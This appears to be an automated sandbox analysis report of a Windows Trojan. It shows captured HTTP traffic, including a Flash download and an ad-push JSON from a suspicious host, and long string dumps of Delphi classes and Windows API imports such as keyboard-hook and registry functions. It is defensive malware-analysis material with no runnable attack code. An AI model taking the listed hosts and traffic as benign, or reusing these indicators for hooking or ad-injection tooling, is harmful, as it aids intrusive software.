Content-Type: application/x-shockwave-flash
Content-Length: 50941
Connection: keep-alive
Last-Modified: Wed, 10 Jun 2015 03:56:27 GMT
ETag: "5577b56b-c6fd"
Expires: Sat, 25 Jul 2015 19:58:45 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
CWS.....x...e@.].6<{o...[.......$E@Z.A...S...K....KT.w..z]..~....s......u.s..Y..53:..M..)....I.....`...v...@....:../-'..@w.tw..H.X.p()..2Q...PP`..Q.....>x.@A...@@@@....<`a`.... ......`..;% l<<.J<..ZV.>Z.B...~.!1.A!~.J<.!...;q1aA~~>............t..` ._AL..%...A0@.....@@w..k..!..,.<.....C7...*....B....K)....Le.......S.O50w.1~.@..`..1..b....T T.. ....(}.....E][..("...b..GD..*&E(V...[.[...T.oP...#..l2cs.daU.<../."..TFM.*...kl.7.@.K.SpQ.Sj.........R..S1!$n...q.a)k.U....".S.i Q.....#8....9$.R...F..=..%...%c...a....2.m.(8.G...3Z..~."1k>DZS.P....d..H~.'..T.....'.dXK.3..6..wV..YZ.X...,...%._.[.".,...EXX!........).qq...x.^.....(y)....`.....J...F.jx.{.. .~.>.:6.H..].. .7*.......a.v^..g..q..[.A..SC.BR..D.L..........IY.....<.m........8HCcs..V......8....S.K..G....1..S#..) ....VCQ=w]x.y.............E.!Fu.j...Lv.n..fDP@....& ik..'5K.x_.r..sD...r.....K.ZO.NM...T.....T.}Q...w..0.|..*.:.n/?..U..*.JG}..|%.......3N..5...k..#..R>.R.}.P..@..e#.L.j .rl.(...T..gc..0....c.......{.s!....'Fl..&..a...`.J.. K.JU$Q*.%2LV...K.!d.'0DM.F-..l.d.S..&............M. 3c=..H.....~. T.<..8..Y:......i...LG$.y... .oL.UAPw..L)!...p.XA^.}Ri.X~.(..v.q..8..@O..........7q$.....n..vr.'8.e...y....\..e...b...K.N8..b.S.'.L./..)...0U..%.2..4..3...K.d-.=..:.F..,..........\X..^.@5..-.Pw...,P.E. .........};Cn.M^Q..:3..ed.n."o.|....ZdQ.0..((.|.3|....|.k.C....z<,{.Q.y.4nt&.....l_...kx.".{......7.L.0H..s=Z.1.'.T.wSKXz.?.$Y. S...C......U!.W .T.-..{O.c_.............8e...E.!..5......./. |...:F.I0..%.........~.J.ns`Yi..K.p.
<<< skipped >>>
GET /app/json/advstyle/9.js HTTP/1.1
Accept: */*
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: json.app.sushouspell.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 19 Mar 2015 08:50:22 GMT
Accept-Ranges: bytes
ETag: "4b578bc2162d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 19:14:22 GMT
Content-Length: 381
...{"styleid":"9","title":"\u0050\u0043\u63a8\u9001\u0020\u53f3\u4e0b\u94fe\u63a5","intervaltimeone":"10","intervaltime":"253","appid":"1","item":[{"advid":"19","styleid":"9","advtitle":"\u53f3\u4e0b\u94fe\u63a5\u5730\u5740","advdesc":"","advimg":"hXXp://image.anbangjiance.com/play/appcasimg/","adpackagename":"","advshowtype":"1","showtimes":"176","daytimes":"0","advurl":""}]}..HTTP/1.1 200 OK..Content-Type: application/x-javascript..Last-Modified: Thu, 19 Mar 2015 08:50:22 GMT..Accept-Ranges: bytes..ETag: "4b578bc2162d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Sat, 25 Jul 2015 19:14:22 GMT..Content-Length: 381.....{"styleid":"9","title":"\u0050\u0043\u63a8\u9001\u0020\u53f3\u4e0b\u94fe\u63a5","intervaltimeone":"10","intervaltime":"253","appid":"1","item":[{"advid":"19","styleid":"9","advtitle":"\u53f3\u4e0b\u94fe\u63a5\u5730\u5740","advdesc":"","advimg":"hXXp://image.anbangjiance.com/play/appcasimg/","adpackagename":"","advshowtype":"1","showtimes":"176","daytimes":"0","advurl":""}]}....
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_196:
biClrImportant
biClrImportant
tagMSG
tagMSG
Windows
Windows
HKEY
HKEY
TWMKey
TWMKey
KeyData
KeyData
grfLocksSupported
grfLocksSupported
ENotSupportedException
ENotSupportedException
ENoMonitorSupportException
ENoMonitorSupportException
.uvCOu
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
etNoMonitorSupportException
etNoMonitorSupportException
Operator
Operator
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
EInvalidOperation|
EInvalidOperation|
TList.TDirection
TList.TDirection
AOperator
AOperator
TThread.TSynchronizeRecord
TThread.TSynchronizeRecord
TOperation
TOperation
Operation
Operation
FOnExecute
FOnExecute
OnExecute8
OnExecute8
TList.Sort$ActRec
TList.Sort$ActRec
TComponent.FindComponent$ActRec
TComponent.FindComponent$ActRec
TComponent.FindComponent$ActRecl&D
TComponent.FindComponent$ActRecl&D
HelpKeyword
HelpKeyword
UnderstandsKeyword
UnderstandsKeyword
DeleteKey
DeleteKey
TRegKeyInfo
TRegKeyInfo
NumSubKeys
NumSubKeys
MaxSubKeyLen
MaxSubKeyLen
FCurrentKey
FCurrentKey
FRootKey
FRootKey
FCloseRootKey
FCloseRootKey
CloseKey
CloseKey
CreateKey
CreateKey
GetKeyInfo
GetKeyInfo
GetKeyNames
GetKeyNames
HasSubKeys
HasSubKeys
KeyExists
KeyExists
LoadKey
LoadKey
MoveKey
MoveKey
OpenKey
OpenKey
OpenKeyReadOnly
OpenKeyReadOnly
ReplaceKey
ReplaceKey
RestoreKey
RestoreKey
SaveKey
SaveKey
UnLoadKey
UnLoadKey
CurrentKey@
CurrentKey@
LastErrorMsgh
LastErrorMsgh
RootKey@
RootKey@
RootKeyName
RootKeyName
EInvalidGraphicOperation
EInvalidGraphicOperation
SupportsPartialTransparency
SupportsPartialTransparency
SupportsClipboardFormat
SupportsClipboardFormat
Monochrome42E
Monochrome42E
TCustomButton.TButtonStyle
TCustomButton.TButtonStyle
OnKeyDown|^H
OnKeyDown|^H
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
poPortrait
poPortrait
APort
APort
Port
Port
FProportional
FProportional
Proportional
Proportional
FAutoHotkeys
FAutoHotkeys
RethinkHotkeys
RethinkHotkeys
AutoHotkeys,
AutoHotkeys,
IsShortCut
IsShortCut
AutoHotkeysx
AutoHotkeysx
igoParentPassthrough
igoParentPassthrough
FAlwaysShowDragImages
FAlwaysShowDragImages
AlwaysShowDragImages
AlwaysShowDragImages
toFlickFallbackKeys
toFlickFallbackKeys
'TCustomGestureEngine.TGestureEngineFlag
'TCustomGestureEngine.TGestureEngineFlag
(TCustomGestureEngine.TGestureEngineFlags
(TCustomGestureEngine.TGestureEngineFlags
Supported
Supported
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
FHelpKeyword
FHelpKeyword
FOnKeyDown
FOnKeyDown
FOnKeyPress
FOnKeyPress
FOnKeyUp
FOnKeyUp
IsHintMsg
IsHintMsg
FNativeWheelSupport
FNativeWheelSupport
FWheelSupportMessage
FWheelSupportMessage
thHeaderItemLeftPressed
thHeaderItemLeftPressed
tsArrowBtnLeftPressed
tsArrowBtnLeftPressed
ttbThumbLeftPressed
ttbThumbLeftPressed
lrMonoChrome
lrMonoChrome
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
fsShowing
fsShowing
FWindowState
FWindowState
FKeyPreview
FKeyPreview
WantChildKey
WantChildKey
KeyPreviewt
KeyPreviewt
WindowStatex
WindowStatex
KeyPreview
KeyPreview
WindowState
WindowState
FBiDiKeyboard
FBiDiKeyboard
FNonBiDiKeyboard
FNonBiDiKeyboard
FEnumAllWindowsOnActivateHint
FEnumAllWindowsOnActivateHint
FOnActionExecute
FOnActionExecute
Keyword
Keyword
EnumAllWindowsOnActivateHint@
EnumAllWindowsOnActivateHint@
BiDiKeyboard@
BiDiKeyboard@
NonBiDiKeyboard
NonBiDiKeyboard
OnActionExecute
OnActionExecute
TFileOperation
TFileOperation
FileOperation
FileOperation
FCompletionPort
FCompletionPort
LicenseKey
LicenseKey
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserFileDownload
TWebBrowserNavigateError
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
%TWebBrowserPrivacyImpactedStateChange
FOnWindowSetResizable
FOnWindowSetResizable
FOnWindowSetLeft
FOnWindowSetLeft
FOnWindowSetTop
FOnWindowSetTop
FOnWindowSetWidth
FOnWindowSetWidth
FOnWindowSetHeight
FOnWindowSetHeight
TWebBrowser&
TWebBrowser&
cmdID
cmdID
cmdexecopt
cmdexecopt
TWebBrowser|
TWebBrowser|
OnWindowSetResizable
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetLeft
OnWindowSetTop
OnWindowSetTop
OnWindowSetWidth
OnWindowSetWidth
OnWindowSetHeightp
OnWindowSetHeightp
LocationURL
LocationURL
AMsg
AMsg
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRange
EIdInvalidPortRange
CheckIPVersionSupport
CheckIPVersionSupport
VPort
VPort
WSGetServByPort
WSGetServByPort
APortNumber
APortNumber
IdStackWindows
IdStackWindows
TIdSocketListWindows4
TIdSocketListWindows4
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsg
TIdStackWindowsg
ReceiveMsg
ReceiveMsg
WSTranslateSocketErrorMsg
WSTranslateSocketErrorMsg
SupportsIPv6
SupportsIPv6
TIdStackWindows
TIdStackWindows
EIdIPVersionUnsupportedhHN
EIdIPVersionUnsupportedhHN
EIdIPVersionUnsupported@HN
EIdIPVersionUnsupported@HN
FSourcePort
FSourcePort
FDestPort
FDestPort
SourcePort
SourcePort
DestPort
DestPort
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
FClientPortMin
FClientPortMin
FClientPortMax
FClientPortMax
FPort
FPort
FPeerPort
FPeerPort
ClientPortMin
ClientPortMin
ClientPortMax@
ClientPortMax@
PeerPortSVW
PeerPortSVW
EIdPortRequired
EIdPortRequired
EIdTCPConnectionError
EIdTCPConnectionError
EIdObjectTypeNotSupported
EIdObjectTypeNotSupported
VMsgEnd
VMsgEnd
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
FPassword
FPassword
OpenUDP
OpenUDP
CloseUDP
CloseUDP
RecvFromUDP
RecvFromUDP
VPeerPort
VPeerPort
SendToUDP
SendToUDP
Password
Password
FBoundPort
FBoundPort
FBoundPortMax
FBoundPortMax
FBoundPortMin
FBoundPortMin
TIdTCPClientCustom'
TIdTCPClientCustom'
TIdTCPClientCustom
TIdTCPClientCustom
IdTCPClient
IdTCPClient
BoundPort
BoundPort
BoundPortMax
BoundPortMax
BoundPortMin
BoundPortMin
TIdTCPClient
TIdTCPClient
Uh.UO
Uh.UO
IPAsString
IPAsString
%EIdSocksUDPNotSupportedBySOCKSVersion
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
saUsernamePassword
FUDPSocksAssociation
FUDPSocksAssociation
FDefaultPort
FDefaultPort
DefaultPort
DefaultPort
BoundPortMin8
BoundPortMin8
FLastCmdResult
FLastCmdResult
TIdTCPConnectionB
TIdTCPConnectionB
RaiseExceptionForLastCmdResult
RaiseExceptionForLastCmdResult
SendCmd
SendCmd
SendCmdf
SendCmdf
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
IdTCPConnection
LastCmdResult
LastCmdResult
URLDecode
URLDecode
URLEncode
URLEncode
Password@
Password@
Port@
Port@
AURL
AURL
FHttpOnly
FHttpOnly
HttpOnly@
HttpOnly@
FCommentURL
FCommentURL
FPortList
FPortList
FRecvPort
FRecvPort
FUsePort
FUsePort
CommentURL
CommentURL
PortCount
PortCount
UsePort
UsePort
RecvPort
RecvPort
CompressFTPDeflate
CompressFTPDeflate
CompressFTPToIO
CompressFTPToIO
DecompressFTPFromIO
DecompressFTPFromIO
DecompressFTPDeflate
DecompressFTPDeflate
CompressHTTPDeflate
CompressHTTPDeflate
DecompressHTTPDeflate
DecompressHTTPDeflate
TerminatingExceptionClassh
TerminatingExceptionClassh
fPassThrough
fPassThrough
PassThrough
PassThrough
MakeFTPSvrPort
MakeFTPSvrPort
MakeFTPSvrPasv
MakeFTPSvrPasv
FURL
FURL
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPassword
ProxyPassword
ProxyPort@
ProxyPort@
dsa_keygen
dsa_keygen
pub_key
pub_key
priv_key
priv_key
PEVP_PKEYT,R
PEVP_PKEYT,R
EVP_PKEY_union
EVP_PKEY_union
EVP_PKEY
EVP_PKEY
pkey
pkey
pkey_type
pkey_type
required_pkey_type
required_pkey_type
key_len
key_len
key_length
key_length
AUTHORITY_KEYID
AUTHORITY_KEYID
keyid
keyid
PAUTHORITY_KEYID
PAUTHORITY_KEYID
X509_PUBKEY
X509_PUBKEY
public_key
public_key
PX509_PUBKEY
PX509_PUBKEY
X509_CERT_AUX
X509_CERT_AUX
PX509_CERT_AUX
PX509_CERT_AUX
cert_info
cert_info
ex_nscert
ex_nscert
get_cert_methods
get_cert_methods
cert_crl
cert_crl
ppem_password_cb
ppem_password_cb
key_arg_length
key_arg_length
key_arg
key_arg
master_key_length
master_key_length
master_key
master_key
sess_cert
sess_cert
Ptlsext_ticket_key_cb!
Ptlsext_ticket_key_cb!
cert_store
cert_store
default_passwd_callback
default_passwd_callback
default_passwd_callback_userdata
default_passwd_callback_userdata
client_cert_cb
client_cert_cb
extra_certs
extra_certs
max_cert_list
max_cert_list
cert
cert
msg_callback
msg_callback
msg_callback_arg
msg_callback_arg
client_cert_engine
client_cert_engine
tlsext_tick_key_name
tlsext_tick_key_name
tlsext_tick_hmac_key
tlsext_tick_hmac_key
tlsext_tick_aes_key
tlsext_tick_aes_key
tlsext_ticket_key_cb
tlsext_ticket_key_cb
init_msg
init_msg
read_key
read_key
write_key
write_key
key_material_length
key_material_length
key_material
key_material
tmp_cert_type
tmp_cert_type
tmp_cert_length
tmp_cert_length
tmp_cert_verify_md
tmp_cert_verify_md
tmp_cert_req
tmp_cert_req
tmp_key_block_length
tmp_key_block_length
tmp_key_block
tmp_key_block
tmp_cert_request
tmp_cert_request
msg_len
msg_len
w_msg_hdr
w_msg_hdr
r_msg_hdr
r_msg_hdr
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
TPasswordEvent
TPasswordEvent
Certificate
Certificate
fsRootCertFile
fsRootCertFile
fsCertFile
fsCertFile
fsKeyFile
fsKeyFile
RootCertFile@
RootCertFile@
CertFile@
CertFile@
KeyFile
KeyFile
LoadRootCert
LoadRootCert
LoadCert
LoadCert
RootCertFiled
RootCertFiled
CertFiled
CertFiled
fPeerCert
fPeerCert
PeerCert`
PeerCert`
fOnGetPassword
fOnGetPassword
OnGetPassword
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertErrorp
EIdOSSLLoadingRootCertErrorp
EIdOSSLLoadingCertErrorX
EIdOSSLLoadingCertErrorX
EIdOSSLLoadingCertError0
EIdOSSLLoadingCertError0
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
TIdHTTPConnectionType
TIdHTTPConnectionType
IdHTTP
IdHTTP
TIdHTTPOption
TIdHTTPOption
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPOnHeadersAvailable
FHTTP
FHTTP
TIdHTTPResponse7
TIdHTTPResponse7
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPRequest5
TIdHTTPRequest5
AHTTP
AHTTP
TIdHTTPRequestp%S
TIdHTTPRequestp%S
TIdHTTPProtocol;
TIdHTTPProtocol;
TIdHTTPProtocol
TIdHTTPProtocol
FHTTPProto
FHTTPProto
TIdCustomHTTP'
TIdCustomHTTP'
TIdCustomHTTPl*S
TIdCustomHTTPl*S
HTTPOptionst S
HTTPOptionst S
TIdHTTP
TIdHTTP
EIdHTTPProtocolExceptionn
EIdHTTPProtocolExceptionn
EIdHTTPProtocolException
EIdHTTPProtocolException
BaseHttpn
BaseHttpn
GetWebRequestByGet
GetWebRequestByGet
GetWebRequestByPost
GetWebRequestByPost
BaseHttpd
BaseHttpd
HttpHelper
HttpHelper
WebBrowser1
WebBrowser1
WebMainFrm
WebMainFrm
fKeyword
fKeyword
Keywordd
Keywordd
ShowCmd
ShowCmd
HotKey
HotKey
UrlMon
UrlMon
IdTCPServer
IdTCPServer
IdCustomTCPServer
IdCustomTCPServer
1.2.3
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
inflate 1.2.3 Copyright 1995-2005 Mark Adler
KGS!@#$%X
KGS!@#$%X
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
kernel32.dll
kernel32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyW
LoadKeyboardLayoutW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextW
GetKeyNameTextW
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
version.dll
version.dll
GetCPInfo
GetCPInfo
CreateIoCompletionPort
CreateIoCompletionPort
RegUnLoadKeyW
RegUnLoadKeyW
RegSaveKeyW
RegSaveKeyW
RegRestoreKeyW
RegRestoreKeyW
RegReplaceKeyW
RegReplaceKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegLoadKeyW
RegLoadKeyW
RegFlushKey
RegFlushKey
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExW
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
shell32.dll
shell32.dll
ShellExecuteW
ShellExecuteW
winspool.drv
winspool.drv
netapi32.dll
netapi32.dll
uxtheme.dll
uxtheme.dll
DWMAPI.DLL
DWMAPI.DLL
windowscodecs.dll
windowscodecs.dll
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
(Webapp
(Webapp
KWindows
KWindows
0IdHTTPHeaderInfo
0IdHTTPHeaderInfo
IdTCPServer
IdTCPServer
Font.Charset
Font.Charset
Font.Color
Font.Color
Font.Height
Font.Height
Font.Name
Font.Name
Font.Style
Font.Style
TWebBrowser
TWebBrowser
Lines.Strings
Lines.Strings
Picture.Data
Picture.Data
(7),01444
(7),01444
'9=82<.342>
'9=82<.342>
lstrcmpiALoadLibraryALocalFreeLocalAllocGetACPSleepVirtualFreeVirtualAllocGetSystemInfoGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdVirtualQueryWideCharToMultiByteMultiByteToWideCharlstrlenWlstrcpynWLoadLibraryExWIsValidLocaleGetSystemDefaultUILanguageGetStartupInfoAGetProcAddressGetModuleHandleWGetModuleFileNameWGetUserDefaultUILanguageGetLocaleInfoWGetLastErrorGetCommandLineWFreeLibraryFindFirstFileWFindCloseExitProcessExitThreadCreateThreadCompareStringWWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionCloseHandleRegQueryValueExWRegOpenKeyExWRegCloseKeyLoadStringWMessageBoxACharNextWSysFreeStringSysReAllocStringLenSysAllocStringLenTlsSetValueTlsGetValueLocalAllocGetModuleHandleWCreateWindowExWWindowFromPointWaitMessageUpdateWindowUnregisterClassWUnhookWindowsHookExTranslateMessageTranslateMDISysAccelTrackPopupMenuSystemParametersInfoWShowWindowShowScrollBarShowOwnedPopupsSetWindowsHookExWSetWindowTextWSetWindowPosSetWindowPlacementSetWindowLongWSetTimerSetScrollRangeSetScrollPosSetScrollInfoSetRectSetPropWSetParentSetMenuItemInfoWSetMenuSetForegroundWindowSetFocusSetCursorPosSetCursorSetClassLongWSetCaptureSetActiveWindowSendMessageASendMessageWScrollWindowScreenToClientRemovePropWRemoveMenuReleaseDCReleaseCaptureRegisterWindowMessageWRegisterClipboardFormatWRegisterClassWRedrawWindowPtInRectPostQuitMessagePostMessageWPeekMessageAPeekMessageWOffsetRectMsgWaitForMultipleObjectsExMsgWaitForMultipleObjectsMessageBoxWMapWindowPointsMapVirtualKeyWLoadStringWLoadKeyboardLayoutWLoadIconWLoadCursorWLoadBitmapWKillTimerIsZoomedIsWindowVisibleIsWindowUnicodeIsWindowEnabledIsWindowIsIconicIsDialogMessageAIsDialogMessageWIsChildInvalidateRectIntersectRectInsertMenuItemWInsertMenuWInflateRectGetWindowThreadProcessIdGetWindowTextWGetWindowRectGetWindowPlacementGetWindowLongWGetWindowDCGetTopWindowGetSystemMetricsGetSystemMenuGetSysColorBrushGetSysColorGetSubMenuGetScrollRangeGetScrollPosGetScrollInfoGetPropWGetParentGetWindowGetMessageTimeGetMessagePosGetMessageExtraInfoGetMenuStringWGetMenuStateGetMenuItemInfoWGetMenuItemIDGetMenuItemCountGetMenuGetLastActivePopupGetKeyboardStateGetKeyboardLayoutNameWGetKeyboardLayoutListGetKeyboardLayoutGetKeyStateGetKeyNameTextWGetIconInfoGetForegroundWindowGetFocusGetDesktopWindowGetDCExGetDCGetCursorPosGetCursorGetClipboardDataGetClientRectGetClassLongWGetClassInfoWGetCaptureGetActiveWindowFrameRectFindWindowExWFindWindowWFillRectEnumWindowsEnumThreadWindowsEnumChildWindowsEndPaintEnableWindowEnableScrollBarEnableMenuItemDrawTextExWDrawTextWDrawMenuBarDrawIconExDrawIconDrawFrameControlDrawFocusRectDrawEdgeDispatchMessageADispatchMessageWDestroyWindowDestroyMenuDestroyIconDestroyCursorDeleteMenuDefWindowProcWDefMDIChildProcWDefFrameProcWCreatePopupMenuCreateMenuCreateIconCreateAcceleratorTableWCopyIconClientToScreenCheckMenuItemCharUpperBuffWCharNextWCharLowerBuffWCharLowerWCallWindowProcWCallNextHookExBeginPaintAdjustWindowRectExActivateKeyboardLayoutAlphaBlendUnrealizeObjectStretchDIBitsStretchBltStartPageStartDocWSetWindowOrgExSetWinMetaFileBitsSetViewportOrgExSetTextColorSetStretchBltModeSetROP2SetPixelSetMapModeSetEnhMetaFileBitsSetDIBitsSetDIBColorTableSetBrushOrgExSetBkModeSetBkColorSetAbortProcSelectPaletteSelectObjectSaveDCRoundRectRestoreDCResizePaletteRectangleRectVisibleRealizePalettePolylinePolygonPolyBezierToPolyBezierPlayEnhMetaFilePiePatBltMoveToExMaskBltLineToLPtoDPIntersectClipRectGetWindowOrgExGetWinMetaFileBitsGetTextMetricsWGetTextExtentPoint32WGetSystemPaletteEntriesGetStockObjectGetRgnBoxGetPixelGetPaletteEntriesGetObjectWGetNearestPaletteIndexGetEnhMetaFilePaletteEntriesGetEnhMetaFileHeaderGetEnhMetaFileDescriptionWGetEnhMetaFileBitsGetDeviceCapsGetDIBitsGetDIBColorTableGetDCOrgExGetCurrentPositionExGetClipBoxGetBrushOrgExGetBitmapBitsGdiFlushFrameRgnExtTextOutWExtFloodFillExcludeClipRectEnumFontsWEnumFontFamiliesExWEndPageEndDocEllipseDeleteObjectDeleteEnhMetaFileDeleteDCCreateSolidBrushCreateRectRgnCreatePenIndirectCreatePaletteCreateICWCreateHalftonePaletteCreateFontIndirectWCreateEnhMetaFileWCreateDIBitmapCreateDIBSectionCreateDCWCreateCompatibleDCCreateCompatibleBitmapCreateBrushIndirectCreateBitmapCopyEnhMetaFileWCloseEnhMetaFileChordBitBltArcAbortDocVerQueryValueWGetFileVersionInfoSizeWGetFileVersionInfoWlstrcpyWWritePrivateProfileStringWWriteFileWideCharToMultiByteWaitForSingleObjectWaitForMultipleObjectsExVirtualQueryExVirtualQueryVirtualFreeVirtualAllocTryEnterCriticalSectionSwitchToThreadSuspendThreadSleepSizeofResourceSignalObjectAndWaitSetThreadPrioritySetThreadLocaleSetLastErrorSetFilePointerSetFileAttributesWSetEventSetErrorModeSetEndOfFileResumeThreadResetEventReadFileReadDirectoryChangesWRaiseExceptionQueryPerformanceFrequencyQueryPerformanceCounterPostQueuedCompletionStatusIsDebuggerPresentMultiByteToWideCharMulDivMoveFileWLockResourceLoadResourceLoadLibraryWLeaveCriticalSectionInitializeCriticalSectionGlobalUnlockGlobalSizeGlobalLockGlobalFreeGlobalFindAtomWGlobalDeleteAtomGlobalAllocGlobalAddAtomWGetVersionExWGetVersionGetUserDefaultLCIDGetTimeZoneInformationGetTickCountGetThreadPriorityGetThreadLocaleGetTempPathWGetStdHandleGetQueuedCompletionStatusGetProcAddressGetPrivateProfileStringWGetModuleHandleWGetModuleFileNameWGetLocaleInfoWGetLocalTimeGetLastErrorGetFullPathNameWGetFileSizeGetFileAttributesWGetExitCodeThreadGetExitCodeProcessGetDiskFreeSpaceWGetDateFormatWGetCurrentThreadIdGetCurrentThreadGetCurrentProcessIdGetCurrentProcessGetComputerNameWGetCPInfoFreeResourceInterlockedExchangeAddInterlockedExchangeInterlockedCompareExchangeFreeLibraryFormatMessageWFindResourceWFindNextFileWFindFirstFileWFindCloseFileTimeToLocalFileTimeFileTimeToDosDateTimeExitProcessEnumCalendarInfoWEnterCriticalSectionDeleteFileWDeleteCriticalSectionCreateThreadCreateProcessWCreateIoCompletionPortCreateFileWCreateEventWCopyFileWCompareStringWCloseHandleRegUnLoadKeyWRegSetValueExWRegSaveKeyWRegRestoreKeyWRegReplaceKeyWRegQueryValueExWRegQueryInfoKeyWRegOpenKeyExWRegLoadKeyWRegFlushKeyRegEnumValueWRegEnumKeyExWRegDeleteValueWRegDeleteKeyWRegCreateKeyExWRegConnectRegistryWRegCloseKeyGetErrorInfoGetActiveObjectSysFreeStringCreateStreamOnHGlobalOleRegEnumVerbsIsAcceleratorOleDrawOleSetMenuDescriptorOleUninitializeOleInitializeCoTaskMemFreeProgIDFromCLSIDStringFromCLSIDCoCreateInstanceCoGetClassObjectCoUninitializeCoInitializeIsEqualGUIDInitializeFlatSBFlatSB_SetScrollPropFlatSB_SetScrollPosFlatSB_SetScrollInfoFlatSB_GetScrollPosFlatSB_GetScrollInfo_TrackMouseEventImageList_GetImageInfoImageList_SetIconSizeImageList_GetIconSizeImageList_WriteImageList_ReadImageList_GetDragImageImageList_DragShowNolockImageList_DragMoveImageList_DragLeaveImageList_DragEnterImageList_EndDragImageList_BeginDragImageList_CopyImageList_L